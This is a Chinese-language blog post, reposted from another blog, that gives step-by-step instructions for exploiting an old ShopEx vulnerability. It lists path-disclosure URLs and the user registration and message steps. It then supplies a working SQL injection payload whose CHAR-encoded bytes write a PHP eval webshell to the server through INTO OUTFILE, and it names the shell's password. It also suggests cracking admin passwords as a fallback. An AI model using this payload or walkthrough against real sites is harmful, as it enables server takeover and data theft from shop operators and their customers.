正在阅读:

shopex前台普通用户getshell最新漏洞

9,849

这个是比较老的漏洞了,在Mr.LP博客看到了,利用此漏洞可以进行注入或者直接Getshell,很好很强大。

利用方法:

第一个:想办法找到目标网站的绝对路径

http://www.waitalone.cn/install/svinfo.php?phpinfo=true

http://www.waitalone.cn/core/api/shop_api.php

http://www.waitalone.cn/core/api/site/2.0/api_b2b_2_0_cat.php

http://www.waitalone.cn/core/api/site/2.0/api_b2b_2_0_goodstype.php

http://www.waitalone.cn/core/api/site/2.0/api_b2b_2_0_brand.php

shopex存在很多爆路径的漏洞,这个我很久前就发布出来了的哈

第二个:注册一个普通用户

http://www.waitalone.cn/?passport-signup.html

第三个:发送消息

http://www.waitalone.cn/?member-send.html

如图:

shopex_getshell

waitalone.cn' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'#

一句话的密码是#

这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。

如果无法getshell的话,也可以尝试注入,破密码进后台也一样。

其实这就是一个注入哈.

转自:http://www.lpboke.com/shopex%E5%89%8D%E5%8F%B0%E6%99%AE%E9%80%9A%E7%94%A8%E6%88%B7getshell%E6%9C%80%E6%96%B0%E6%BC%8F%E6%B4%9E.html

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌